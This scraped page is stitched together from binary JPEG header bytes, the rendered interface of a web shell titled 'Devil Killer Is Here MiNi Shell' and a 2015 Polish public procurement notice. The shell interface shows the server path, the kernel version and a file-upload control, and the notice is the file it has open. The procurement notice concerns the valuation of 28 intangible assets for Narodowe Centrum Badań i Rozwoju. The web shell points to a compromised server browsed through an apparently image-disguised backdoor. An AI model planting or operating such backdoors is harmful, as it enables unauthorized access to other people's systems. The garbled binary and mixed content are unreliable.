JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150403/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150403/47289-N-2015.html

<p class="kh_header"><b>Warszawa: Wycena 28 wartości niematerialnych i prawnych</b><br>
<b>Numer ogłoszenia: 47289 - 2015; data zamieszczenia: 03.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Narodowe Centrum Badań i Rozwoju , ul. Nowogrodzka 47a, 00-695 Warszawa, woj. mazowieckie, tel. (+48 22) 39 07 401, faks (+48 22) 20 13 408.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ncbr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wycena 28 wartości niematerialnych i prawnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa wyceny maksymalnie 28 wartości niematerialnych i prawnych (WNiP) w projektach B+R dofinansowanych przez Narodowe Centrum Badań 
i Rozwoju.
2.	Usługa wyceny obejmowała będzie kompleksowe oszacowanie wartości, jak również czynności bezpośrednio związane z przeprowadzeniem wyceny, w szczególności: pozyskanie danych rynkowych o dobrach konkurencyjnych, dobranie i oszacowanie odpowiednich wskaźników finansowych lub ekonomicznych, danych potrzebnych do analizy ryzyka, danych potrzebnych do analizy potencjału rynków zbytu, spodziewanych wyników sprzedaży dla założonego okresu. 
3.	Usługa wyceny zostanie wykonana wg. dwóch metodologii, a także zawierała będzie analizę porównawczą wyników wyceny dokonanej wg. obu metodologii. Wycena musi zostać przeprowadzona na podstawie powszechnie obowiązujących standardów.
4.	Wykonawca, przed realizację zlecenia, musi przedstawić uzasadnienie wybranych metod wyceny.
5.	W stosunku do każdej wyceny ustalane będą jej podstawowe założenia i przesyłane wraz ze zleceniem. 
6.	Wykonawca będzie realizował przedmiot umowy sukcesywnie, w miarę potrzeb, na podstawie pisemnych zamówień ze strony Zamawiającego w terminie nie dłuższym niż 14 dni roboczych od przyjęcia zlecenia.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.40.00.00-8, 71.31.90.00-7.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania przedmiotowego warunku.
Ocena spełnienia powyższego warunku nastąpi według formuły spełnia/nie spełnia na podstawie
oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu składanego na podstawie
art. 44 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku określonego w art. 22 ust. 1 pkt 2 ustawy Pzp (posiadanie wiedzy i
doświadczenia), Wykonawcy winni wykazać się wiedzą i doświadczeniem w realizacji zamówienia lub
wykazać wiedzę i doświadczenie innego podmiotu, o którym mowa w art. 26 ust. 2b ustawy Pzp, w
postaci należytego wykonania/wykonywania w okresie ostatnich trzech lat przed upływem terminu
składania wniosków, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie usług
polegających na przeprowadzeniu, wyceny 50 wartości niematerialnych i prawnych (WNiP)
powstałych na bazie innowacyjnych pomysłów w wyniku prowadzonych prac rozwojowych i badań
przemysłowych. Wartość wycenianych przez wykonawcę wartości niematerialnych i prawnych
wyniosła 500 mln zł netto, z których 10% (wycenianych wartości niematerialnych i prawnych) było z
prawami do patentów. Na potwierdzenie spełnienia ww. warunku Wykonawcy przedłożą
oświadczenie wymienione w pkt 6.1.2. Instrukcji oraz dokumenty, o których mowa w pkt 6.1.5.
Instrukcji. W przypadku, gdy Wykonawcy będą polegać na wiedzy i doświadczeniu innego podmiotu,
o którym mowa w art. 26 ust. 2b ustawy Pzp, oprócz oświadczenia, wymienionego w pkt 6.1.2.
INSTRUKCJI i wykazu usług, o którym mowa w pkt 6.1.5. Instrukcji, dodatkowo winni oni przedłożyć
także dokumenty określone w pkt 6.2. Instrukcji. W przypadku wniosku składanego przez
Wykonawców ubiegających się wspólnie o wykonanie zamówienia wystarczy, że ww. warunek spełni
jeden z nich lub Wykonawcy spełnią go łącznie. Ocena spełnienia ww. warunku odbywać się będzie
metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania przedmiotowego warunku.
Ocena spełnienia powyższego warunku nastąpi według formuły spełnia/nie spełnia na podstawie
oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu składanego na podstawie
art. 44 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku określonego w art. 22 ust. 1 pkt 3 ustawy Pzp (dysponowania osobami zdolnymi
do wykonania zamówienia), Wykonawcy wykażą, że dysponują lub zgodnie z art. 26 ust. 2b ustawy
PZP, będą dysponować do realizacji zamówienia zespołem składającym się z co najmniej 9 osób,
które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za
świadczenie usług, w tym co najmniej: 1. jedną osobą z uprawnieniami Biegłego Rewidenta
posiadającą doświadczenie w sporządzeniu łącznie minimum 30 wycen wartości niematerialnych i
prawnych (WNiP) powstałych na bazie innowacyjnych pomysłów w wyniku prowadzonych prac
rozwojowych i badań przemysłowych; 2. jednym ekspertem posiadającym doświadczenie w
sporządzeniu łącznie minimum 30 wycen wartości niematerialnych i prawnych (WNiP) powstałych na bazie innowacyjnych pomysłów w wyniku prowadzonych prac rozwojowych i badań przemysłowych;
3. siedmioma ekspertami merytorycznymi, po jednym dla każdej z niżej wymienionych branż
a)Nowe technologie dotyczące mechaniki, mechatroniki, elektroniki, elektrotechniki, transportu,
logistyki, b) Energetyka, w tym źródła energii odnawialnej, c) Nauki Chemiczne, d) Medycyna
ogólna i kliniczna, biotechnologia medyczna oraz inżynieria medyczna jako nauki medyczne i nauki o
zdrowiu, e)Techniki wytwarzania silników lotniczych, śmigłowców i samolotów, f)Systemy
informatyczne, g) Nauki ekonomiczne Każdy z ww. ekspertów merytorycznych powinien posiadać
doświadczenie w sporządzaniu minimum 10 wycen wartości niematerialnych i prawnych (WNiP),
powstałych na bazie innowacyjnych pomysłów w wyniku prowadzonych prac rozwojowych i badań
przemysłowych, w swojej branży. Zamawiający nie dopuszcza możliwości łączenia przez jedną
osobę funkcji wskazanych w pkt 1. - 3. Na potwierdzenie spełnienia ww. warunku Wykonawcy
przedłożą oświadczenie wymienione w pkt. 6.1.2. Instrukcji oraz dokumenty, o których mowa w pkt.
6.1.6. Instrukcji. W przypadku, gdy Wykonawcy będą polegać na osobach zdolnych do wykonania
zamówienia innego podmiotu, o którym mowa w art. 26 ust. 2b ustawy PZP, oprócz oświadczenia,
wymienionego w pkt. 6.1.2. Instrukcji oraz dokumentów, o których mowa w pkt 6.1.6., dodatkowo
winni oni przedłożyć także dokumenty określone w pkt 6.3. SIWZ. W przypadku wniosku składanego
przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia wystarczy, że ww. warunek
spełni jeden z nich lub Wykonawcy spełnią go łącznie. Ocena spełnienia ww. warunku odbywać się
będzie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku określonego w art. 22 ust. 1 pkt 4 uPzp (dotyczącego sytuacji ekonomicznej i
finansowej) Wykonawcy winni wykazać, że są ubezpieczeni lub wykazać ubezpieczenie innego
podmiotu, o którym mowa w art. 26 ust. 2b uPzp, od odpowiedzialności cywilnej w zakresie
prowadzonej działalności związanej z przedmiotem zamówienia w wysokości nie mniejszej niż 1 000
000,00 zł brutto co najmniej na czas obejmujący datę składania wniosków. Na potwierdzenie
spełnienia ww. warunku Wykonawcy przedłożą oświadczenie wymienione w pkt. 6.1.2. Instrukcji oraz
dokumenty, o których mowa w pkt. 6.1.7. Instrukcji. W przypadku, gdy Wykonawcy będą polegać
na potencjale ekonomicznym i finansowym do wykonania zamówienia innego podmiotu, o którym
mowa w art. 26 ust. 2b ustawy Pzp, oprócz oświadczenia, wymienionego w pkt. 6.1.2. Instrukcji oraz
dokumentów, o których mowa w pkt 6.1.7., dodatkowo winni oni przedłożyć także dokumenty
określone w pkt 6.4. Instrukcji. W przypadku wniosku składanego przez Wykonawców ubiegających
się wspólnie o udzielenie zamówienia wystarczy, że ww. warunek spełni jeden z nich lub Wykonawcy
spełnią go łącznie. Ocena spełnienia ww. warunku odbywać się będzie metodą spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oryginał pełnomocnictwa albo kopia uwierzytelniona notarialnie lub poświadczona za zgodność z
oryginałem przez osobę(-y) upoważnioną(-e) do reprezentowania Wykonawcy (tzn. zgodnie z formą
reprezentacji określoną w odpowiednim rejestrze lub innym dokumencie właściwym dla formy
organizacyjnej Wykonawcy) - w przypadku podpisywania wniosku przez pełnomocnika. Nie jest
dopuszczalne potwierdzanie za zgodność z oryginałem treści pełnomocnictwa przez samego
pełnomocnika umocowanego tymże pełnomocnictwem, radcę prawnego i adwokata. Z treści
pełnomocnictwa winno wynikać uprawnienie pełnomocnika do reprezentowania Wykonawcy.
Wykonawcy ubiegający się wspólnie o udzielenie zamówienia (np. spółki cywilne, konsorcja), zgodnie
z art. 23 ust. 2 ustawy Pzp, zobowiązani są ustanowić pełnomocnika. Z treści pełnomocnictwa winno
wynikać prawo pełnomocnika do reprezentowania Wykonawcy w postępowaniu o udzielenie
zamówienia publicznego albo do reprezentowania i zawarcia umowy w sprawie zamówienia
publicznego w imieniu Wykonawcy. Dokument ten winien być podpisany przez osobę/osoby
uprawnioną(-e) do jego udzielenia tj. zgodnie z formą reprezentacji każdego z Wykonawców. W
przypadku wspólników spółki cywilnej dopuszczalne jest przedłożenie umowy spółki cywilnej, z której
wynika zakres i sposób reprezentacji, a w przypadku konsorcjum przedłożenie umowy konsorcjum
2. W przypadku, gdy Wykonawcy będą polegać na wiedzy i doświadczeniu innego podmiotu, o
którym mowa w art. 26 ust. 2b ustawy Pzp, dodatkowo winni oni przedłożyć dokument
potwierdzający, że będą dysponować zasobami innego podmiotu w trakcie realizacji zamówienia, w
zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia np. pisemne
zobowiązanie tego podmiotu do udziału w realizacji zamówienia i oddania do dyspozycji Wykonawcy
wymaganej wiedzy i doświadczenia. 3. W przypadku, gdy Wykonawcy będą polegać na osobach
zdolnych do wykonania zamówienia innego podmiotu, o którym mowa w art. 26 ust. 2b ustawy Pzp,
dodatkowo winni oni przedłożyć dokument potwierdzający, że będą dysponować zasobami innego
podmiotu w trakcie realizacji zamówienia np. pisemne zobowiązanie tego podmiotu do oddania do dyspozycji Wykonawcy osoby(-ób) posiadającej (-ych) niezbędne kwalifikacje. 4. W przypadku, gdy
Wykonawcy będą polegać na potencjale ekonomicznym i finansowym do wykonania zamówienia
innego podmiotu, o którym mowa w art. 26 ust. 2b ustawy Pzp, dodatkowo winni oni przedłożyć
dokument potwierdzający, że będą dysponować zasobami innego podmiotu w trakcie realizacji
zamówienia np. pisemne zobowiązanie tego podmiotu do oddania do dyspozycji Wykonawcy
wymaganego potencjału</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana istotnych postanowień Umowy w stosunku do treści Oferty, dopuszczalna jest w sytuacji,
gdy jest ona korzystna dla Zamawiającego, nie była możliwa do przewidzenia na etapie zawarcia
Umowy, a ponadto jej dokonanie podyktowane jest w szczególności: 1) zmianie osób
wyznaczonych do realizacji Przedmiotu Umowy pod warunkiem, że Zamawiający wyrazi na to zgodę
na piśmie, a nowe osoby zastępujące osoby pierwotnie wskazane do realizacji Przedmiotu Umowy
będą musiały spełnić warunki, o których mowa w Instrukcji dla Wykonawców. 2) obniżeniem
wysokości ceny jednostkowej za Usługę, o której mowa w § 4 ust. 1 Umowy; 3) zmianą przepisów
prawa; 4) zmianą stanu faktycznego powodującego nieracjonalność lub niecelowość dalszej
realizacji Umowy na zasadach określonych w Umowie; 5) działaniem siły wyższej uniemożliwiającej
realizację w części lub w całości Przedmiotu Umowy na zasadach określonych w Umowie; 6)
działaniem osób trzecich, za które żadna ze Stron nie ponosi odpowiedzialności; 7) rozbieżnościami
lub niejasnościami w Umowie, których nie można usunąć w inny sposób a zmiana będzie
umożliwiać usunięcie rozbieżności i doprecyzowanie Umowy w celu jednoznacznej interpretacji jej
zapisów przez Strony. 2. Jeżeli zmiana przepisów prawa w okresie obowiązywania Umowy
powodować będzie konieczność zmiany Umowy, Strony dokonają niezwłocznie zmiany Umowy w
zakresie wymaganym tymi przepisami. 3. W przypadku wystąpienia w czasie trwania Umowy zmian,
które będą miały wpływ na koszty wykonania Przedmiotu Umowy przez Wykonawcę w postaci zmiany: 1) stawki podatku od towarów i usług; 2) wysokości minimalnego wynagrodzenia za pracę
ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym
wynagrodzeniu za pracę (Dz. U. Nr 200, poz. 1679, ze zm.); 3) zasad podlegania ubezpieczeniom
społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia
społeczne lub zdrowotne; każda ze Stron może zwrócić się do drugiej Strony o przeprowadzenie
negocjacji w sprawie odpowiedniej zmiany wynagrodzenia. Strona zwracająca się do drugiej Strony o
przeprowadzenie negocjacji winna wykazać, że zaistniała zmiana ma bezpośredni wpływ na koszty
wykonania Przedmiotu Umowy. Zamawiający zastrzega sobie prawo do żądania przedstawienia przez
Wykonawcę dokumentów potwierdzających zasadność zwrócenia się Wykonawcy o
przeprowadzenie negocjacji w sprawie zmiany wynagrodzenia. 4. Wszelkie zmiany Umowy
wymagają formy pisemnej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>

<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.4.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> https://licytacje.uzp.gov.pl</p>
<p><b>IV.4.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> http://www.ncbr.gov.pl/bip/zamowienia-publiczne/</p>
<p><b>IV.4.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> 1. W licytacji elektronicznej mogą brać udział wyłącznie Wykonawcy zarejestrowani w systemie
platformy licytacji elektronicznej pod adresem https://licytacje.uzp.gov.pl 2. Wykonawcy,
wypełniając odpowiednie pole we wniosku o dopuszczenie do udziału w licytacji elektronicznej
(Załącznik nr 1 do niniejszej Instrukcji) przekazują Zamawiającemu swój LOGIN. 3. W przypadku
podania przez Wykonawcę niewłaściwego loginu (login należy podać dokładnie stosując te same
znaki w tym duże i małe litery jeżeli takie zastosowano) bądź nie przekazania go Zamawiającemu
wraz z wnioskiem, Wykonawca jest zobowiązany do jego przekazania najpóźniej jeden dzień przez
terminem otwarcia licytacji. Nie dostarczenie loginu w sposób i w terminie określonym powyżej
będzie traktowane jako odstąpienie Wykonawcy od dalszego postępowania. 4. Wymagania
techniczne komputera Wykonawcy: 4.1. Wykonawca winien posiadać komputer PC z systemem
operacyjnym Windows/Linux oraz przeglądarkę internetową Internet Explorer 6.0. lub wyższą lub
Firefox 2.0 lub wyższą. Szczegółowe wymogi techniczne określone zostały w § 3 Regulaminu
korzystania z Platformy na stronie internetowej UZP https://licytacje.uzp.gov.pl/page/rules oraz w
/Samouczku/ w pkt 7 na stronie internetowej UZP https://licytacje.uzp.gov.pl/page/selflearn
Zamawiający nie ponosi odpowiedzialności za nieprawidłowości wynikające z korzystania przez Wykonawców z oprogramowania innego niż zalecane; 4.2. W interesie Wykonawcy komputer winien
być stabilnie podłączony do sieci internetowej..</p>
<p><b>IV.4.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> 1. W toku licytacji elektronicznej uprzednio dopuszczeni i zaproszeni do udziału Wykonawcy składają
kolejne postąpienia. Składanie postąpień będzie możliwe od otwarcia licytacji do jej zamknięcia. 2.
W toku licytacji Wykonawcy oferują rzeczywistą cenę oferty brutto, za realizację całego przedmiotu
zamówienia (28 wycen), wyrażoną w złotych oraz w groszach. Grosze należy oddzielić od złotych
kropką. 3. Oferta złożona przez Wykonawcę winna być niższa od oferty najkorzystniejszej, co
najmniej o kwotę minimalnego postąpienia. 4. Cenę kolejnego korzystniejszego postąpienia należy
wpisać po uprzednim zapoznaniu się z aktualnym najkorzystniejszym postąpieniem cenowym
wpisując z rozwagą /cenę przebicia oferty najkorzystniejszej/ tak aby omyłkowo nie wprowadzić
niewłaściwej ceny. System jedynie /dopytuje się/ o oferty, które złożone są w kwocie niższej o 50%
od ceny oferty najkorzystniejszej. Inne oferty traktowane są jako wiążące i nie ma możliwości
dokonywania korekty uprzednio omyłkowo wprowadzonej kwoty ponieważ jest ona przez system
traktowana jako ostateczna i wiążąca po /kliknięciu/ przycisku /potwierdź/. 5. Zamawiający przyjął
za minimalne postąpienie wartość 1000.00 zł brutto. 6. W toku licytacji elektronicznej Zamawiający
automatycznie za pośrednictwem platformy licytacyjnej na bieżąco będzie przekazywał wszystkim
Wykonawcom informacje o pozycji złożonych przez nich ofert, liczbie Wykonawców biorących udział
w licytacji elektronicznej, a także o złożonych przez nich cenach, z tym że do momentu zamknięcia
licytacji elektronicznej nie ujawnia informacji umożliwiających identyfikację Wykonawców. Ww.
informacje są na bieżąco dostępne po /kliknięciu/ na zakładkę /lista postąpień/. 7. Wykonawca po
dokonaniu każdego postąpienia cenowego lub na bieżąco winien dokonywać odświeżania strony
celem aktualizacji listy postąpień, tak aby posiadał aktualną listę postąpień z aktualnymi cenami. 8.
Aktualny czas w trakcie licytacji elektronicznej wyświetlany na Platformie Licytacji Elektronicznej jest
decydujący dla oceny momentu dokonania poszczególnych czynności, w tym również dla oceny czy
